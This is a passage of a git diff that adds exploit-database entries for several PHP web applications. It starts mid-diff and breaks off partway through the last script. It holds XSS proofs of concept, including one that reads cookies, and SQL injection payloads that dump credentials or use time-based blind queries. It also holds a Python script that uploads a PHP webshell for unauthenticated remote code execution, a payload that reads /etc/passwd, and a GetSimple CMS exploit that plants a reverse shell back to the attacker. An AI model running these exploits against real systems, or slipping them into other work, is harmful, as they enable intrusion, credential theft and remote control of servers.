+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
+Content-Type: image/jpeg
+
+image content asdfasdfasdfasdfasdfasdfasdfa
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="title"
+
+<img src=1 onerror=alert("XSS-1")>
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="shortdesc"
+
+fffff
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="date"
+
+2023-05-14
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="time"
+
+11:05
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="episodecover"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="longdesc"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="episodenum"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="seasonnum"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="itunesKeywords"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="explicit"
+
+yes
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="authorname"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="authoremail"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="customtags"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="token"
+
+6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
+------WebKitFormBoundary3NXAbhxohxCgUFNi--
+
+
+
+
+
+
+#########XSS -2##############
+1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
+2. set Freebox content as <script>alert("XSS-2")</script>
+3.go to home page (http://localhost/PodcastGenerator/)
+
+payload: <script>alert("XSS-2")</script>
+
+poc Request:
+
+POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
+Host: localhost
+Content-Length: 96
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
+
+#########XSS -3##############
+
+1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
+2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
+3.go to home page (http://localhost/PodcastGenerator/)
+
+payload: <svg/onload=prompt("XSS-3")>
+
+poc-request:
+
+POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
+Host: localhost
+Content-Length: 300
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd©right=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
\ No newline at end of file
diff --git a/exploits/php/webapps/51462.py b/exploits/php/webapps/51462.py
new file mode 100755
index 000000000..5bedcff56
--- /dev/null
+++ b/exploits/php/webapps/51462.py
@@ -0,0 +1,148 @@
+# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
+# Google Dork: NA
+# Date: 15/5/2023
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
+# Version: 1.0
+# Tested on: Kali Linux
+
+import sys
+import requests
+import subprocess
+import time
+
+if len(sys.argv) < 2:
+ print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
+ print("Example: %s 192.168.106.130" % sys.argv[0])
+ sys.exit(1)
+
+ip = sys.argv[1]
+url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
+
+def brute_force_timestamp(timestamp_prev, ip):
+ progress = 0
+ webshell = None
+
+ for i in range(20):
+ for j in range(0, 1000, 20):
+ timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
+ url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
+
+ response = requests.get(url)
+ if response.status_code == 200:
+ webshell = url
+ break
+
+ progress += 1
+ print(f"Attempt {progress}/400", end="\r")
+ time.sleep(0.1)
+
+ if progress >= 400:
+ break
+
+ if webshell or progress >= 400:
+ break
+
+ if webshell:
+ print("\033[92m[+] Webshell found:", webshell, "\033[0m")
+ else:
+ print("\033[91m[-] Webshell not found\033[0m")
+
+ return webshell
+
+def get_unix_timestamp():
+ timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
+ return int(timestamp)
+
+def extract_output(response_text):
+ start_tag = "<pre>"
+ end_tag = "</pre>"
+ start_index = response_text.find(start_tag)
+ end_index = response_text.find(end_tag)
+
+ if start_index != -1 and end_index != -1 and start_index < end_index:
+ output = response_text[start_index + len(start_tag):end_index]
+ return output.strip()
+
+ return None
+
+def code_execution(webshell):
+ if not webshell:
+ print("\033[91mWebshell URI not provided\033[0m")
+ return
+
+ while True:
+ command = input("Enter command to execute (or 'exit' to quit): ")
+ if command == 'exit':
+ break
+
+ url = webshell + f"?cmd={command}"
+ response = requests.get(url)
+
+ output = extract_output(response.text)
+ if output:
+ print("\033[93m[+] Output:\033[0m")
+ print(output)
+ else:
+ print("\033[91m[-] No output received\033[0m")
+
+data = '''\
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="name"
+
+test
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="email"
+
+test@gmail.com
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="contact"
+
+9000000000
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="about"
+
+test
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="img"; filename="shell.php"
+Content-Type: application/x-php
+
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+ if(isset($_GET['cmd']))
+ {
+ system($_GET['cmd']);
+ }
+?>
+</pre>
+</body>
+</html>
+
+-----------------------------49858899034227071432271107689--'''
+
+headers = {
+ 'Host': f"{ip}",
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
+ 'Content-Length': str(len(data)),
+ 'Connection': 'close'
+}
+
+timestamp_prev = get_unix_timestamp()
+response = requests.post(url, data=data, headers=headers)
+
+if response.status_code == 200 and response.text == '1':
+ print("[+] Timestamp: %s" % timestamp_prev)
+ print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
+ webshell = brute_force_timestamp(timestamp_prev, ip)
+ code_execution(webshell)
+
+else:
+ print("Did not worked")
\ No newline at end of file
diff --git a/exploits/php/webapps/51463.txt b/exploits/php/webapps/51463.txt
new file mode 100644
index 000000000..78cf0e55c
--- /dev/null
+++ b/exploits/php/webapps/51463.txt
@@ -0,0 +1,20 @@
+Exploit Title: Prestashop 8.0.4 - CSV injection
+Application: prestashop
+Version: 8.0.4
+Bugs: CSV Injection
+Technology: PHP
+Vendor URL: https://prestashop.com/
+Software Link: https://prestashop.com/prestashop-edition-basic/
+Date of found: 14.05.2023
+Author: Mirabbas Ağalarov
+Tested on: Windows
+
+
+2. Technical Details & POC
+========================================
+Step 1. login as user
+step 2. Go to My Account then information ( http://localhost/index.php?controller=identity )
+step 3. Set Email as =calc|a!z|@test.com
+step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)
+
+payload: =calc|a!z|@test.com
\ No newline at end of file
diff --git a/exploits/php/webapps/51464.txt b/exploits/php/webapps/51464.txt
new file mode 100644
index 000000000..c075a8587
--- /dev/null
+++ b/exploits/php/webapps/51464.txt
@@ -0,0 +1,63 @@
+#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
+#Application: SitemagicCMS
+#Version: 4.4.3
+#Bugs: RCE
+#Technology: PHP
+#Vendor URL: https://sitemagic.org/Download.html
+#Software Link: https://github.com/Jemt/SitemagicCMS
+#Date of found: 14-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+1. go to content then files
+2. upload shell.phar file but content as <?php echo system("cat /etc/passwd"); ?>
+3. go to http://localhost/SitemagicCMS/files/images/shell.phar
+
+
+
+payload: <?php echo system("cat /etc/passwd"); ?>
+
+
+
+Poc request :
+
+POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
+Host: localhost
+Content-Length: 492
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
+Connection: close
+
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W
+Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
+Content-Type: application/octet-stream
+
+<?php echo system('cat /etc/passwd'); ?>
+
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W
+Content-Disposition: form-data; name="SMPostBackControl"
+
+
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W
+Content-Disposition: form-data; name="SMRequestToken"
+
+60a7a113cf94842a197912273825b421
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
\ No newline at end of file
diff --git a/exploits/php/webapps/51465.txt b/exploits/php/webapps/51465.txt
new file mode 100644
index 000000000..b898117bd
--- /dev/null
+++ b/exploits/php/webapps/51465.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
+# Date: 15 May 2023
+# Exploit Author: Astik Rawat (ahrixia)
+# Vendor Homepage: https://qloapps.com/
+# Software Link: https://github.com/webkul/hotelcommerce
+# Version: 1.5.2
+# Tested on: Kali Linux 2022.4
+# CVE : CVE-2023-30256
+
+
+Description:
+
+A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.
+
+Steps to exploit:
+1) Go to Signin page on the system.
+2) There are two parameters which can be exploited via XSS
+ - back
+ - email_create
+
+2.1) Insert your payload in the "back"- GET and POST Request
+ Proof of concept (Poc):
+ The following payload will allow you to execute XSS -
+
+ Payload (Plain text):
+ xss onfocus=alert(1) autofocus= xss
+
+ Payload (URL Encoded):
+ xss%20onfocus%3dalert(1)%20autofocus%3d%20xss
+
+ Full GET Request (back):
+ [http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]
+
+2.2) Insert your payload in the "email_create" - POST Request Only
+ Proof of concept (Poc):
+ The following payload will allow you to execute XSS -
+
+ Payload (Plain text):
+ xss><img src=a onerror=alert(document.cookie)>xss
+
+ Payload (URL Encoded):
+ xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss
+
+ POST Request (email_create) (POST REQUEST DATA ONLY):
+ [controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]
\ No newline at end of file
diff --git a/exploits/php/webapps/51468.txt b/exploits/php/webapps/51468.txt
new file mode 100644
index 000000000..f326dcb08
--- /dev/null
+++ b/exploits/php/webapps/51468.txt
@@ -0,0 +1,28 @@
+[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
+[#] Exploit Date: May 16, 2023.
+[#] CVSS 3.1: 6.4 (Medium)
+[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+[#] Tactic: Initial Access (TA0001)
+[#] Technique: Exploit Public-Facing Application (T1190)
+[#] Application Name: Affiliate Me
+[#] Application Version: 5.0.1
+[#] Vendor: https://www.powerstonegh.com/
+
+
+[#] Author: h4ck3r - Faisal Albuloushi
+[#] Contact: SQL@hotmail.co.uk
+[#] Blog: https://www.0wl.tech
+
+
+[#] Exploit:
+
+[path]/admin.php?show=reply&id=[Injected Query]
+
+
+[#] 3xample:
+
+[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
+
+
+[#] Notes:
+- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/51471.txt b/exploits/php/webapps/51471.txt
new file mode 100644
index 000000000..91f318e86
--- /dev/null
+++ b/exploits/php/webapps/51471.txt
@@ -0,0 +1,45 @@
+# Exploit Title: LeadPro CRM v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578
+# Demo Site: https://demo.leadifly.in
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10
+HTTP/1.1
+Host: localhost
+Cookie:
+XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;
+leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: application/json
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V
+Authorization: Bearer
+eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8
+X-Xsrf-Token:
+eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
+Referer: https://localhost/admin/product
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+
+### Parameter & Payloads ###
+
+Parameter: filters (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload:
+fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name
+lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND
+(8549=8549&order=id desc&offset=0&limit=10
\ No newline at end of file
diff --git a/exploits/php/webapps/51472.txt b/exploits/php/webapps/51472.txt
new file mode 100644
index 000000000..dc04ec3b2
--- /dev/null
+++ b/exploits/php/webapps/51472.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Smart School v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/smart-school-school-management-system/19426018
+# Demo Site: https://demo.smart-school.in
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /course/filterRecords/ HTTP/1.1
+Host: localhost
+Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 136
+Origin: https://localhost
+Referer: https://localhost/course/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1
+
+
+### Parameter & Payloads ###
+
+Parameter: searchdata[0][searchfield] (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload:
+searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id
+AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--
+hAHp&searchdata[0][searchvalue]=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51473.txt b/exploits/php/webapps/51473.txt
new file mode 100644
index 000000000..0c64b543c
--- /dev/null
+++ b/exploits/php/webapps/51473.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
+# Demo Site: https://demo.stackposts.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /spmo/auth/login HTTP/1.1
+X-Requested-With: XMLHttpRequest
+Referer: https://localhost/spmo/
+Content-Type: application/x-www-form-urlencoded
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Length: 104
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*
+
+
+### Parameter & Payloads ###
+
+Parameter: username (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
+AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
\ No newline at end of file
diff --git a/exploits/php/webapps/51474.txt b/exploits/php/webapps/51474.txt
new file mode 100644
index 000000000..a64b1bbda
--- /dev/null
+++ b/exploits/php/webapps/51474.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Quicklancer v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
+# Demo Site: https://quicklancer.bylancer.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /php/user-ajax.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+x-requested-with: XMLHttpRequest
+Referer: https://localhost
+Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;
+quickjob_view_counted=31; Quick_lang=arabic
+Content-Length: 93
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+action=searchStateCountry&dataString=deneme
+
+
+### Parameter & Payloads ###
+
+Parameter: dataString (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
+FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo
\ No newline at end of file
diff --git a/exploits/php/webapps/51475.py b/exploits/php/webapps/51475.py
new file mode 100755
index 000000000..9f88973b8
--- /dev/null
+++ b/exploits/php/webapps/51475.py
@@ -0,0 +1,140 @@
+# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
+# Data: 18/5/2023
+# Exploit Author : Youssef Muhammad
+# Vendor: Get-simple
+# Software Link:
+# Version app: 3.3.16
+# Tested on: linux
+# CVE: CVE-2022-41544
+
+import sys
+import hashlib
+import re
+import requests
+from xml.etree import ElementTree
+from threading import Thread
+import telnetlib
+
+purple = "\033[0;35m"
+reset = "\033[0m"
+yellow = "\033[93m"
+blue = "\033[34m"
+red = "\033[0;31m"
+
+def print_the_banner():
+ print(purple + '''
+ CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4
+C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4
+C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444
+C V V E 2 00 0 2 2 4 11 5 4 4
+ CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4
+ '''+ reset)
+
+def get_version(target, path):
+ r = requests.get(f"http://{target}{path}admin/index.php")
+ match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
+ if match:
+ version = match.group(1)
+ if version <= "3.3.16":
+ print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
+ else:
+ print ("This is not vulnrable to this CVE")
+ return version
+ return None
+
+def api_leak(target, path):
+ r = requests.get(f"http://{target}{path}data/other/authorization.xml")
+ if r.ok:
+ tree = ElementTree.fromstring(r.content)
+ apikey = tree[0].text
+ print(f"[+] apikey obtained {apikey}")
+ return apikey
+ return None
+
+def set_cookies(username, version, apikey):
+ cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
+ cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
+ cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
+ headers = {
+ 'Content-Type':'application/x-www-form-urlencoded',
+ 'Cookie': cookies
+ }
+ return headers
+
+def get_csrf_token(target, path, headers):
+ r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
+ m = re.search('nonce" type="hidden" value="(.*)"', r.text)
+ if m:
+ print("[+] csrf token obtained")
+ return m.group(1)
+ return None
+
+def upload_shell(target, path, headers, nonce, shell_content):
+ upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
+ payload = {
+ 'content': shell_content,
+ 'edited_file': '../shell.php',
+ 'nonce': nonce,
+ 'submitsave': 1
+ }
+ try:
+ response = requests.post(upload_url, headers=headers, data=payload)
+ if response.status_code == 200:
+ print("[+] Shell uploaded successfully!")
+ else:
+ print("(-) Shell upload failed!")
+ except requests.exceptions.RequestException as e:
+ print("(-) An error occurred while uploading the shell:", e)
+def shell_trigger(target, path):
+ url = f"http://{target}{path}/shell.php"
+ try:
+ response = requests.get(url)
+ if response.status_code == 200:
+ print("[+] Webshell trigged successfully!")
+ else:
+ print("(-) Failed to visit the page!")
+ except requests.exceptions.RequestException as e:
+ print("(-) An error occurred while visiting the page:", e)
+
+def main():
+ if len(sys.argv) != 5:
+ print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
+ return
+
+ target = sys.argv[1]
+ path = sys.argv[2]
+ if not path.endswith('/'):
+ path += '/'
+
+ ip, port = sys.argv[3].split(':')
+ username = sys.argv[4]
+ shell_content = f"""<?php
+ $ip = '{ip}';
+ $port = {port};
+ $sock = fsockopen($ip, $port);
+ $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
+ """
+
+ version = get_version(target, path)
+ if not version:
+ print("(-) could not get version")
+ return
+
+ apikey = api_leak(target, path)
+ if not apikey:
+ print("(-) could not get apikey")
+ return
+
